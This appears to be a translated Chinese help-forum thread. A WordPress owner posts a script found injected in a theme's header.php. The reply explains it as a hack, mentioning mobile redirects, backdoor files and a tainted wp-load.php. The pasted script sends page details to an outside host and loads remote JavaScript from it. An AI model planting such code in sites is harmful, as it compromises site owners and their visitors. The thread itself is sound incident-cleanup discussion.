我在下面的代码中找到了主题的header.php文件,我不确定它们是什么。
<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://tradenetservice.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>
答案 0 :(得分:1)
一周前我有一个被黑客攻击的wordpress网站,注射类似。我在header.php中添加了代码,只有在从移动设备浏览网站时才会将用户重定向到外部网站(广告,色情网站)。
还注入了活动主题中的其他文件。
我所做的是下载所有站点文件,并将它们与备份进行比较。通过这种方式,我在主题中找到了注入的代码,还有/ wp-includes /中的一些文件,这些文件不是常规wordpress安装的一部分,是一种后门。
同时检查站点根目录上的wp-load.php,在我的情况下,我从/ wp-includes /中删除的文件正在此文件中的一行中包含/执行。
除了清理您网站的代码之外,您应该进行一些关于保护您的WordPress网站免受黑客攻击的搜索,并会发现许多建议的措施,以防止它再次发生。